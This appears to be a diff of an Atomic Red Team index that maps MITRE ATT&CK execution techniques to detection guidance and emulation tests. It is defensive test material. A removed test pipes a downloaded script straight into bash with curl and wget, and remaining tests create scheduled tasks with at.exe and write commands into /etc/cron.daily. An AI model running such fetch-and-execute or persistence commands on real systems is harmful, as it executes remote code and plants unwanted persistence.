+ x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
+ techniques will likely occur in the first steps of an operation but may also
+ occur throughout as an adversary learns the environment. Data and events should
+ not be viewed in isolation, but as part of a chain of behavior that could
+ lead to other activities, such as lateral movement, based on the information
+ obtained. Detecting actions related to virtualization and sandbox identification
+ may be difficult depending on the adversary's implementation and monitoring
+ required. Monitoring for suspicious processes being spawned that gather a
+ variety of system information or perform other forms of Discovery, especially
+ in a short period of time, may aid in detection.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_is_subtechnique: false
+ atomic_tests: []
execution:
T1059.002:
technique:
@@ -38537,7 +39852,7 @@ execution:
url: https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html
description: Apple. (2016, January 25). Introduction to AppleScript Language
Guide. Retrieved March 28, 2020.
- - url: https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/
+ - url: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/
description: Yerko Grbic. (2017, February 14). Macro Malware Targets Macs.
Retrieved July 8, 2017.
source_name: Macro Malware Targets Macs
@@ -38556,19 +39871,19 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T16:44:34.580Z'
+ modified: '2020-04-14T13:28:17.696Z'
created: '2020-03-09T14:07:54.329Z'
- x_mitre_platforms:
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor for execution of AppleScript through osascript that
+ may be related to other suspicious behavior occurring on the system.
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- x_mitre_detection: Monitor for execution of AppleScript through osascript that
- may be related to other suspicious behavior occurring on the system.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
identifier: T1059.002
atomic_tests:
- name: AppleScript
@@ -38616,11 +39931,9 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-23T22:35:13.112Z'
created: '2019-12-03T12:59:36.749Z'
- x_mitre_platforms:
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
x_mitre_detection: "Monitor scheduled task creation using command-line invocation.
Legitimate scheduled tasks may be created during installation of new software
or through system administration functions. Look for changes to tasks that
@@ -38631,9 +39944,11 @@ execution:
could lead to other activities, such as network connections made for Command
and Control, learning details about the environment through Discovery, and
Lateral Movement."
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1053.002:
technique:
@@ -38688,8 +40003,16 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-24T13:43:40.776Z'
created: '2019-11-27T13:52:45.853Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -38705,16 +40028,8 @@ execution:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -38732,105 +40047,17 @@ execution:
command: 'at 13:20 /interactive cmd
'
- T1059.004:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1059.004
- url: https://attack.mitre.org/techniques/T1059/004
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bash
- description: "Adversaries may abuse Bash commands and scripts for execution.
- Bash, the primary macOS (through Mojave) and Linux shell, can control every
- aspect of a system, with certain commands requiring elevated privileges. \n\nBash
- scripts (.sh) provide the shell with a list of sequential commands to run,
- as well as normal scripting operations such as conditionals and loops. Common
- uses of Bash scripts include long or repetitive tasks, or the need to run
- the same set of commands on multiple systems."
- id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T17:06:19.681Z'
- created: '2020-03-09T14:15:05.330Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: "Bash usage may be common on administrator, developer, or
- power user systems, depending on job function. If scripting is restricted
- for normal users, then any attempt to enable scripts running on a system would
- be considered suspicious. If scripts are not commonly used on a system, but
- enabled, scripts running out of cycle from patching or other administrator
- functions are suspicious. Scripts should be captured from the file system
- when possible to determine their actions and intent.\n\nScripts are likely
- to perform actions with various effects on a system that may generate events,
- depending on the types of monitoring used. Monitor processes and command-line
- arguments for script execution and subsequent behavior. Actions may be related
- to network and system information Discovery, Collection, or other scriptable
- post-compromise behaviors and could be used as indicators of detection leading
- back to the source script. "
- x_mitre_permissions_required:
- - User
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1059.004
- atomic_tests:
- - name: Create and Execute Bash Shell Script
- auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
- description: 'Creates and executes a simple bash script.
-
-'
- supported_platforms:
- - macos
- - linux
- input_arguments:
- script_path:
- description: Script path
- type: path
- default: "/tmp/art.sh"
- executor:
- command: |
- sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
- sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
- chmod +x #{script_path}
- sh #{script_path}
- cleanup_command: 'rm #{script_path}
-
-'
- name: sh
- - name: Command-Line Interface
- auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
- description: |
- Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
-
- Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
- supported_platforms:
- - macos
- - linux
- executor:
- command: |
- curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
- wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
- cleanup_command: 'rm /tmp/art-fish.txt
-
-'
- name: sh
T1059:
technique:
id: attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Command and Scripting Interpreter
description: |-
- Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, many Linux distributions include [Bash](https://attack.mitre.org/techniques/T1059/004) as a default shell while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- There are also additional third-party interpreters, such as [Python](https://attack.mitre.org/techniques/T1059/006), that may also be cross-platform.
+ There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
+
+ Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.
external_references:
- source_name: mitre-attack
external_id: T1059
@@ -38842,27 +40069,28 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T17:44:07.939Z'
+ modified: '2020-06-25T03:32:51.380Z'
created: '2017-05-31T21:30:49.546Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - Windows Registry
- - Windows event logs
- - PowerShell logs
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: Command-line and scripting activities can be captured through
- proper logging of process execution with command-line arguments. This information
- can be useful in gaining additional insight to adversaries' actions through
- how they use native processes or custom tools.
+ x_mitre_is_subtechnique: false
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
+
+ If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+
+ Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
+ x_mitre_data_sources:
+ - Windows event logs
+ - PowerShell logs
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '2.0'
atomic_tests: []
T1559.001:
technique:
@@ -38870,7 +40098,7 @@ execution:
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)
- Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [VBScript](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
+ Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
name: Component Object Model
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -38906,9 +40134,10 @@ execution:
phase_name: execution
modified: '2020-03-28T19:30:52.639Z'
created: '2020-02-12T14:09:53.107Z'
- x_mitre_data_sources:
- - Process monitoring
- - DLL monitoring
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: "Monitor for COM objects loading DLLs and other modules not
typically associated with the application.(Citation: Enigma Outlook DCOM Lateral
Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012)
@@ -38917,10 +40146,9 @@ execution:
COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects,
especially those invoked by a user different than the one currently logged
on. "
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - DLL monitoring
atomic_tests: []
T1175:
technique:
@@ -39023,20 +40251,8 @@ execution:
phase_name: execution
modified: '2020-03-30T13:36:10.069Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_detection: |-
- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
-
- Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
-
- Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_deprecated: true
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- PowerShell logs
- API monitoring
@@ -39046,8 +40262,20 @@ execution:
- Process monitoring
- Windows Registry
- Windows event logs
- x_mitre_version: '2.0'
- x_mitre_deprecated: true
+ x_mitre_detection: |-
+ Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
+
+ Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
+
+ Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_remote_support: true
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1053.003:
technique:
@@ -39074,12 +40302,11 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-23T23:30:46.546Z'
created: '2019-12-03T14:25:00.538Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -39090,11 +40317,12 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -39146,6 +40374,23 @@ execution:
command: echo "#{command}" > /etc/cron.daily/#{cron_script_name}
T1559.002:
technique:
+ created: '2020-02-12T14:10:50.699Z'
+ modified: '2020-03-28T19:32:56.572Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d
+ description: |-
+ Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
+
+ Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
+
+ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
+ name: Dynamic Data Exchange
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1559.002
@@ -39183,23 +40428,6 @@ execution:
description: NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents.
Retrieved November 21, 2017.
source_name: NVisio Labs DDE Detection Oct 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic Data Exchange
- description: |-
- Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
-
- Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
-
- Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
- id: attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T19:32:56.572Z'
- created: '2020-02-12T14:10:50.699Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
@@ -39317,16 +40545,11 @@ execution:
phase_name: execution
modified: '2020-03-28T19:06:02.690Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_remote_support: true
- x_mitre_system_requirements:
- - Remote exploitation for execution requires a remotely accessible service reachable
- over the network or other vector of access such as spearphishing or drive-by
- compromise.
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - Anti-virus
+ - System calls
+ - Process monitoring
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -39334,11 +40557,16 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- x_mitre_data_sources:
- - Anti-virus
- - System calls
- - Process monitoring
- x_mitre_version: '1.1'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_system_requirements:
+ - Remote exploitation for execution requires a remotely accessible service reachable
+ over the network or other vector of access such as spearphishing or drive-by
+ compromise.
+ x_mitre_remote_support: true
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1061:
technique:
@@ -39365,15 +40593,14 @@ execution:
phase_name: execution
modified: '2020-03-30T13:38:08.738Z'
created: '2017-05-31T21:30:50.342Z'
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Binary file metadata
x_mitre_detection: "Detection of execution through the GUI will likely lead
to significant false positives. Other factors should be considered to detect
misuse of services that can lead to adversaries gaining access to systems
@@ -39382,25 +40609,25 @@ execution:
interactive sessions are suspicious. Collect and audit security logs that
may indicate access to and use of Legitimate Credentials to access remote
systems within the network."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Binary file metadata
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_remote_support: true
atomic_tests: []
T1559:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Inter-Process Communication
+ created: '2020-02-12T14:08:48.689Z'
+ modified: '2020-03-28T19:34:47.546Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
share data, communicate with each other, or synchronize execution. IPC is
@@ -39412,13 +40639,14 @@ execution:
or [Component Object Model](https://attack.mitre.org/techniques/T1559/001).
Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s,
may also leverage underlying IPC mechanisms."
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T19:34:47.546Z'
- created: '2020-02-12T14:08:48.689Z'
+ name: Inter-Process Communication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1559
+ url: https://attack.mitre.org/techniques/T1559
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: false
@@ -39434,6 +40662,65 @@ execution:
- DLL monitoring
- File monitoring
atomic_tests: []
+ T1059.007:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.007
+ url: https://attack.mitre.org/techniques/T1059/007
+ - source_name: NodeJS
+ url: https://nodejs.org/
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ - source_name: JScrip May 2018
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ - source_name: Microsoft JScript 2007
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ - source_name: Microsoft Windows Scripts
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: JavaScript/JScript
+ description: |-
+ Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
+
+ JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
+
+ Adversaries may abuse JavaScript / JScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ modified: '2020-06-25T03:23:13.804Z'
+ created: '2020-06-23T19:12:24.924Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
+
+ Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - DLL monitoring
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ atomic_tests: []
T1569.001:
technique:
external_references:
@@ -39456,30 +40743,30 @@ execution:
By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
- Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.
+ Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.
id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T18:28:34.600Z'
+ modified: '2020-06-08T23:28:29.079Z'
created: '2020-03-10T18:26:56.187Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - root
x_mitre_detection: KnockKnock can be used to detect persistent programs such
as those installed via launchctl as launch agents or launch daemons. Additionally,
every launch agent or launch daemon must have a corresponding plist file on
disk which can be monitored. Monitor process execution from launchctl/launchd
for unusual or unknown processes.
- x_mitre_permissions_required:
- - User
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1569.001
atomic_tests:
- name: Launchctl
@@ -39539,12 +40826,11 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-23T22:41:14.739Z'
created: '2019-12-03T14:15:27.452Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
